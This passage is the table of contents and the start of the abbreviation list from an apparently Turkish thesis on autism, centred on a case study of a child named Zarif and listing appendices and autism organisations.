    3.4. Zarif’in Tıbbi Durumu……………………………………………………………............. 98
    3.5. Zarif’in Eğitimi …………………………………………………………………………… 103
    3.6. Zarif’in Đletisim Becerileri………………………………………………………………... 109
    3.7. Zarif’in Bireysel Yasam Becerileri………………………………………………………. . 111
    3.8. Zarif’in Sosyal Yasam Becerileri………………………………………………………..... 113
    4. SONUÇ VE ÖNERĐLER………………………………………………….............................. 121
    5. KAYNAKLAR…………………………...…………………………………………………... 127
    6. DĐZĐN……………………………………...………………………………………………….. 132
    7. EKLER…………………………………………………...…………………………………… 134
    7.1. Đlgili Formlar………………………………...…………………………………………… . 134
    7.1.1. Rehberlik ve Arastırma Merkezi Tarafından, Bireysel Đncelenmesi Đstenen
    Öğrencilere Ait Gönderme Öncesi Bilgi Formu........................................................ 134
    7.1.2. RAM Rehberlik ve Psikolojik Danısma Hizmetleri Bölümüne Psikolojik
    Destek Đçin Gönderme Öncesi Bilgi Formu.............................................................. 142
    7.1.3. Kaynastırma Yoluyla Eğitim Uygulamasına Alınan Öğrenci Bilgi Formu............... 144
    7.2. Tablolar………………………………...…………………………………………………. 145
    7.3. Resimler……………………………...…………………………………………………..... 167
    7.4. Fotoğraflar………………………………………………………………………………… 173
    7.5. Konuyla Đlgili Basında Çıkan Haberler………………………………………………….... 177
    7.5.1. Yabancı Basın…………………………………………………................................ 177
    7.5.2. Türk Basını………………………………………………….....................................190
    7.6. Arastırma Bütçesi……………………………………...………………………………...... 227
    7.7. Görüsme Örneği…………………………………………………....................................... 229
    7.8. Katılım Yoluyla Gözlem Örneği...........................................................................................245
    7.9. Özgeçmis……………………………...…………………………………………………... 250
    AAA : American Anthropological Association (Amerikan Antropoloji Birliği)
    ABD : Amerika Birlesik Devletleri
    ARI : Autism Research Institute (Otizm Arastırma Enstitüsü)
    ASA : The Autism Society of America (Amerika Otizm Topluluğu)
    AURA : Otistikler Derneği (Türkiye)
    CAN : Cure Autism Now Foundation (Otizmi Simdi Đyilestirin Vakfı)
    CDC : Centre for